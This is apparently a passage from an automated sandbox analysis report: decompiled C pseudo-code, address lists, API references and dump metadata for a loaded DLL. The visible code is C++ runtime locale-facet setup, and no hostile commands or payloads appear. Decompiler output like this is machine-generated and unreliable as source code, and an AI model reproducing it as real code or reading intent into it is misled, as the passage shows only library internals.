																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6d4ec0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6D49542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6D4A0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6D486FD3(__eflags, _t187);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6d546dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6D486FD3(__eflags, _t186);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6d546e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6D486FD3(__eflags, _t185);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6d546dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6D486FD3(__eflags, _t184);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6d546dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6d48fa97
0x6d48fa97
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48fac8
0x6d48facd
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5

APIs

__EH_prolog3.LIBCMT ref: 6D48FA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FAA8
int.LIBCPMT ref: 6D48FABF

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FB37

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a7b2e2dd07edc8c1ed421e9cbdfb2963301d72bdced707641b6659575b757255
Instruction ID: 4d66c89b735543bb92a2e43d1bb85fa5b4f63798f2f84a4374aad38acb22a047
Opcode Fuzzy Hash: a7b2e2dd07edc8c1ed421e9cbdfb2963301d72bdced707641b6659575b757255
Instruction Fuzzy Hash: 6211E07690811A9BCF05EBA0C840EEEB775AF94354F2A400DD612BB395DB70DD01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t638 - 0x14, 0);
				_t609 =  *0x6d546df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6D46161C(0x6d546d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6D4866BA(_t638 - 0x14);
					return E6D4A0075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6D491057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t638 - 0x20);
							E6D4A3D74(_t638 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t594, _t609, 0x14);
							E6D486653(_t638 - 0x14, 0);
							_t610 =  *0x6d546dc0; // 0x0
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6D46161C(0x6d546d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6D4866BA(_t638 - 0x14);
								return E6D4A0075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6D4910BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t638 - 0x20);
										E6D4A3D74(_t638 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t451, _t595, _t610, 0x14);
										E6D486653(_t638 - 0x14, 0);
										_t611 =  *0x6d546df8; // 0x0
										 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
										 *(_t638 - 0x10) = _t611;
										_t235 = E6D46161C(0x6d546da4);
										_t468 =  *((intOrPtr*)(_t638 + 8));
										_t596 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t235);
										__eflags = _t596;
										if(_t596 != 0) {
											L19:
											E6D4866BA(_t638 - 0x14);
											return E6D4A0075(_t596);
										} else {
											__eflags = _t611;
											if(_t611 == 0) {
												_push( *((intOrPtr*)(_t638 + 8)));
												_push(_t638 - 0x10);
												__eflags = E6D491127(_t451, _t468, __edx, _t596, _t611) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t638 - 0x20);
													E6D4A3D74(_t638 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t451, _t596, _t611, 0x14);
													E6D486653(_t638 - 0x14, 0);
													_t612 =  *0x6d546df4; // 0x0
													 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
													 *(_t638 - 0x10) = _t612;
													_t248 = E6D46161C(0x6d546da0);
													_t475 =  *((intOrPtr*)(_t638 + 8));
													_t597 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t248);
													__eflags = _t597;
													if(_t597 != 0) {
														L26:
														E6D4866BA(_t638 - 0x14);
														return E6D4A0075(_t597);
													} else {
														__eflags = _t612;
														if(_t612 == 0) {
															_push( *((intOrPtr*)(_t638 + 8)));
															_push(_t638 - 0x10);
															__eflags = E6D4911AB(_t451, _t475, _t592, _t597, _t612) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t638 - 0x20);
																E6D4A3D74(_t638 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t451, _t597, _t612, 0x14);
																E6D486653(_t638 - 0x14, 0);
																_t613 =  *0x6d546dc8; // 0x0
																 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																 *(_t638 - 0x10) = _t613;
																_t261 = E6D46161C(0x6d546d7c);
																_t482 =  *((intOrPtr*)(_t638 + 8));
																_t598 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t261);
																__eflags = _t598;
																if(_t598 != 0) {
																	L33:
																	E6D4866BA(_t638 - 0x14);
																	return E6D4A0075(_t598);
																} else {
																	__eflags = _t613;
																	if(_t613 == 0) {
																		_push( *((intOrPtr*)(_t638 + 8)));
																		_push(_t638 - 0x10);
																		__eflags = E6D491230(_t451, _t482, _t592, _t598, _t613) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t638 - 0x20);
																			E6D4A3D74(_t638 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t451, _t598, _t613, 0x14);
																			E6D486653(_t638 - 0x14, 0);
																			_t614 =  *0x6d546dc4; // 0x0
																			 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																			 *(_t638 - 0x10) = _t614;
																			_t274 = E6D46161C(0x6d546d78);
																			_t489 =  *((intOrPtr*)(_t638 + 8));
																			_t599 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t274);
																			__eflags = _t599;
																			if(_t599 != 0) {
																				L40:
																				E6D4866BA(_t638 - 0x14);
																				return E6D4A0075(_t599);
																			} else {
																				__eflags = _t614;
																				if(_t614 == 0) {
																					_push( *((intOrPtr*)(_t638 + 8)));
																					_push(_t638 - 0x10);
																					__eflags = E6D4912B4(_t451, _t489, _t592, _t599, _t614) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t638 - 0x20);
																						E6D4A3D74(_t638 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t451, _t599, _t614, 0x14);
																						E6D486653(_t638 - 0x14, 0);
																						_t615 =  *0x6d546dd8; // 0x0
																						 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																						 *(_t638 - 0x10) = _t615;
																						_t287 = E6D46161C(0x6d546d84);
																						_t496 =  *((intOrPtr*)(_t638 + 8));
																						_t600 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t287);
																						__eflags = _t600;
																						if(_t600 != 0) {
																							L47:
																							E6D4866BA(_t638 - 0x14);
																							return E6D4A0075(_t600);
																						} else {
																							__eflags = _t615;
																							if(_t615 == 0) {
																								_push( *((intOrPtr*)(_t638 + 8)));
																								_push(_t638 - 0x10);
																								__eflags = E6D491339(_t451, _t496, _t592, _t600, _t615) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t638 - 0x20);
																									E6D4A3D74(_t638 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t451, _t600, _t615, 0x14);
																									E6D486653(_t638 - 0x14, 0);
																									_t616 =  *0x6d546db0; // 0x0
																									 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																									 *(_t638 - 0x10) = _t616;
																									_t300 = E6D46161C(0x6d546d64);
																									_t503 =  *((intOrPtr*)(_t638 + 8));
																									_t601 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t300);
																									__eflags = _t601;
																									if(_t601 != 0) {
																										L54:
																										E6D4866BA(_t638 - 0x14);
																										return E6D4A0075(_t601);
																									} else {
																										__eflags = _t616;
																										if(_t616 == 0) {
																											_push( *((intOrPtr*)(_t638 + 8)));
																											_push(_t638 - 0x10);
																											__eflags = E6D4913A1(_t451, _t503, _t592, _t601, _t616) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t638 - 0x20);
																												E6D4A3D74(_t638 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t451, _t601, _t616, 0x14);
																												E6D486653(_t638 - 0x14, 0);
																												_t617 =  *0x6d546ddc; // 0x0
																												 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																												 *(_t638 - 0x10) = _t617;
																												_t313 = E6D46161C(0x6d546d88);
																												_t510 =  *((intOrPtr*)(_t638 + 8));
																												_t602 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t313);
																												__eflags = _t602;
																												if(_t602 != 0) {
																													L61:
																													E6D4866BA(_t638 - 0x14);
																													return E6D4A0075(_t602);
																												} else {
																													__eflags = _t617;
																													if(_t617 == 0) {
																														_push( *((intOrPtr*)(_t638 + 8)));
																														_push(_t638 - 0x10);
																														__eflags = E6D491409(_t451, _t510, _t592, _t602, _t617) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t638 - 0x20);
																															E6D4A3D74(_t638 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t451, _t602, _t617, 0x14);
																															E6D486653(_t638 - 0x14, 0);
																															_t618 =  *0x6d546de0; // 0x0
																															 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																															 *(_t638 - 0x10) = _t618;
																															_t326 = E6D46161C(0x6d546d8c);
																															_t517 =  *((intOrPtr*)(_t638 + 8));
																															_t603 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t326);
																															__eflags = _t603;
																															if(_t603 != 0) {
																																L68:
																																E6D4866BA(_t638 - 0x14);
																																return E6D4A0075(_t603);
																															} else {
																																__eflags = _t618;
																																if(_t618 == 0) {
																																	_push( *((intOrPtr*)(_t638 + 8)));
																																	_push(_t638 - 0x10);
																																	__eflags = E6D491471(_t451, _t517, _t592, _t603, _t618) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t638 - 0x20);
																																		E6D4A3D74(_t638 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t451, _t603, _t618, 0x14);
																																		E6D486653(_t638 - 0x14, 0);
																																		_t619 =  *0x6d546dfc; // 0x0
																																		 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																		 *(_t638 - 0x10) = _t619;
																																		_t339 = E6D46161C(0x6d546da8);
																																		_t524 =  *((intOrPtr*)(_t638 + 8));
																																		_t604 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t339);
																																		__eflags = _t604;
																																		if(_t604 != 0) {
																																			L75:
																																			E6D4866BA(_t638 - 0x14);
																																			return E6D4A0075(_t604);
																																		} else {
																																			__eflags = _t619;
																																			if(_t619 == 0) {
																																				_push( *((intOrPtr*)(_t638 + 8)));
																																				_push(_t638 - 0x10);
																																				__eflags = E6D4914EC(_t451, _t524, _t592, _t604, _t619) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t638 - 0x20);
																																					E6D4A3D74(_t638 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t451, _t604, _t619, 0x14);
																																					E6D486653(_t638 - 0x14, 0);
																																					_t620 =  *0x6d546dcc; // 0x0
																																					 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																					 *(_t638 - 0x10) = _t620;
																																					_t352 = E6D46161C(0x6d546d80);
																																					_t531 =  *((intOrPtr*)(_t638 + 8));
																																					_t605 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t352);
																																					__eflags = _t605;
																																					if(_t605 != 0) {
																																						L82:
																																						E6D4866BA(_t638 - 0x14);
																																						return E6D4A0075(_t605);
																																					} else {
																																						__eflags = _t620;
																																						if(_t620 == 0) {
																																							_push( *((intOrPtr*)(_t638 + 8)));
																																							_push(_t638 - 0x10);
																																							__eflags = E6D491558(_t451, _t531, _t592, _t605, _t620) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t638 - 0x20);
																																								E6D4A3D74(_t638 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t451, _t605, _t620, 0x14);
																																								E6D486653(_t638 - 0x14, 0);
																																								_t621 =  *0x6d546e00; // 0x0
																																								 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																								 *(_t638 - 0x10) = _t621;
																																								_t365 = E6D46161C(0x6d546dac);
																																								_t538 =  *((intOrPtr*)(_t638 + 8));
																																								_t606 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t365);
																																								__eflags = _t606;
																																								if(_t606 != 0) {
																																									L89:
																																									E6D4866BA(_t638 - 0x14);
																																									return E6D4A0075(_t606);
																																								} else {
																																									__eflags = _t621;
																																									if(_t621 == 0) {
																																										_push( *((intOrPtr*)(_t638 + 8)));
																																										_push(_t638 - 0x10);
																																										__eflags = E6D4915C4(_t451, _t538, _t592, _t606, _t621) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t638 - 0x20);
																																											E6D4A3D74(_t638 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t451, _t606, _t621, 0x14);
																																											E6D486653(_t638 - 0x14, 0);
																																											_t622 =  *0x6d546dd0; // 0x0
																																											 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																											 *(_t638 - 0x10) = _t622;
																																											_t378 = E6D46161C(0x6d546d60);
																																											_t545 =  *((intOrPtr*)(_t638 + 8));
																																											_t607 = E6D46171B( *((intOrPtr*)(_t638 + 8)), _t378);
																																											__eflags = _t607;
																																											if(_t607 != 0) {
																																												L96:
																																												E6D4866BA(_t638 - 0x14);
																																												return E6D4A0075(_t607);
																																											} else {
																																												__eflags = _t622;
																																												if(_t622 == 0) {
																																													_push( *((intOrPtr*)(_t638 + 8)));
																																													_push(_t638 - 0x10);
																																													__eflags = E6D49162A(_t451, _t545, _t592, _t607, _t622) - 0xffffffff;
																																													if(__eflags == 0) {
																																														_t549 = _t638 - 0x20;
																																														E6D461438(_t549);
																																														E6D4A3D74(_t638 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e851f, _t451, _t607, _t622, 4);
																																														_t623 = _t549;
																																														 *(_t638 - 0x10) = _t623;
																																														 *((intOrPtr*)(_t623 + 4)) =  *((intOrPtr*)(_t638 + 0xc));
																																														_push( *((intOrPtr*)(_t638 + 0x14)));
																																														_t203 = _t638 - 4;
																																														 *_t203 =  *(_t638 - 4) & 0x00000000;
																																														__eflags =  *_t203;
																																														 *_t623 = 0x6d4ec0c4;
																																														 *((char*)(_t623 + 0x28)) =  *((intOrPtr*)(_t638 + 0x10));
																																														E6D49542F(_t451, _t549, _t592, _t607, _t623,  *_t203);
																																														return E6D4A0075(_t623,  *((intOrPtr*)(_t638 + 8)));
																																													} else {
																																														_t607 =  *(_t638 - 0x10);
																																														 *(_t638 - 0x10) = _t607;
																																														 *(_t638 - 4) = 1;
																																														E6D486FD3(__eflags, _t607);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																														 *0x6d546dd0 = _t607;
																																														goto L96;
																																													}
																																												} else {
																																													_t607 = _t622;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t606 =  *(_t638 - 0x10);
																																											 *(_t638 - 0x10) = _t606;
																																											 *(_t638 - 4) = 1;
																																											E6D486FD3(__eflags, _t606);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																											 *0x6d546e00 = _t606;
																																											goto L89;
																																										}
																																									} else {
																																										_t606 = _t621;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t605 =  *(_t638 - 0x10);
																																								 *(_t638 - 0x10) = _t605;
																																								 *(_t638 - 4) = 1;
																																								E6D486FD3(__eflags, _t605);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																								 *0x6d546dcc = _t605;
																																								goto L82;
																																							}
																																						} else {
																																							_t605 = _t620;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t604 =  *(_t638 - 0x10);
																																					 *(_t638 - 0x10) = _t604;
																																					 *(_t638 - 4) = 1;
																																					E6D486FD3(__eflags, _t604);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																																					 *0x6d546dfc = _t604;
																																					goto L75;
																																				}
																																			} else {
																																				_t604 = _t619;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t603 =  *(_t638 - 0x10);
																																		 *(_t638 - 0x10) = _t603;
																																		 *(_t638 - 4) = 1;
																																		E6D486FD3(__eflags, _t603);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																																		 *0x6d546de0 = _t603;
																																		goto L68;
																																	}
																																} else {
																																	_t603 = _t618;
																																	goto L68;
																																}
																															}
																														} else {
																															_t602 =  *(_t638 - 0x10);
																															 *(_t638 - 0x10) = _t602;
																															 *(_t638 - 4) = 1;
																															E6D486FD3(__eflags, _t602);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																															 *0x6d546ddc = _t602;
																															goto L61;
																														}
																													} else {
																														_t602 = _t617;
																														goto L61;
																													}
																												}
																											} else {
																												_t601 =  *(_t638 - 0x10);
																												 *(_t638 - 0x10) = _t601;
																												 *(_t638 - 4) = 1;
																												E6D486FD3(__eflags, _t601);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																												 *0x6d546db0 = _t601;
																												goto L54;
																											}
																										} else {
																											_t601 = _t616;
																											goto L54;
																										}
																									}
																								} else {
																									_t600 =  *(_t638 - 0x10);
																									 *(_t638 - 0x10) = _t600;
																									 *(_t638 - 4) = 1;
																									E6D486FD3(__eflags, _t600);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																									 *0x6d546dd8 = _t600;
																									goto L47;
																								}
																							} else {
																								_t600 = _t615;
																								goto L47;
																							}
																						}
																					} else {
																						_t599 =  *(_t638 - 0x10);
																						 *(_t638 - 0x10) = _t599;
																						 *(_t638 - 4) = 1;
																						E6D486FD3(__eflags, _t599);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																						 *0x6d546dc4 = _t599;
																						goto L40;
																					}
																				} else {
																					_t599 = _t614;
																					goto L40;
																				}
																			}
																		} else {
																			_t598 =  *(_t638 - 0x10);
																			 *(_t638 - 0x10) = _t598;
																			 *(_t638 - 4) = 1;
																			E6D486FD3(__eflags, _t598);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
																			 *0x6d546dc8 = _t598;
																			goto L33;
																		}
																	} else {
																		_t598 = _t613;
																		goto L33;
																	}
																}
															} else {
																_t597 =  *(_t638 - 0x10);
																 *(_t638 - 0x10) = _t597;
																 *(_t638 - 4) = 1;
																E6D486FD3(__eflags, _t597);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
																 *0x6d546df4 = _t597;
																goto L26;
															}
														} else {
															_t597 = _t612;
															goto L26;
														}
													}
												} else {
													_t596 =  *(_t638 - 0x10);
													 *(_t638 - 0x10) = _t596;
													 *(_t638 - 4) = 1;
													E6D486FD3(__eflags, _t596);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
													 *0x6d546df8 = _t596;
													goto L19;
												}
											} else {
												_t596 = _t611;
												goto L19;
											}
										}
									} else {
										_t595 =  *(_t638 - 0x10);
										 *(_t638 - 0x10) = _t595;
										 *(_t638 - 4) = 1;
										E6D486FD3(__eflags, _t595);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
										 *0x6d546dc0 = _t595;
										goto L12;
									}
								} else {
									_t595 = _t610;
									goto L12;
								}
							}
						} else {
							_t594 =  *(_t638 - 0x10);
							 *(_t638 - 0x10) = _t594;
							 *(_t638 - 4) = 1;
							E6D486FD3(__eflags, _t594);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
							 *0x6d546df0 = _t594;
							goto L5;
						}
					} else {
						_t594 = _t609;
						goto L5;
					}
				}
			}

0x6d48f41b
0x6d48f41b
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f44c
0x6d48f451
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
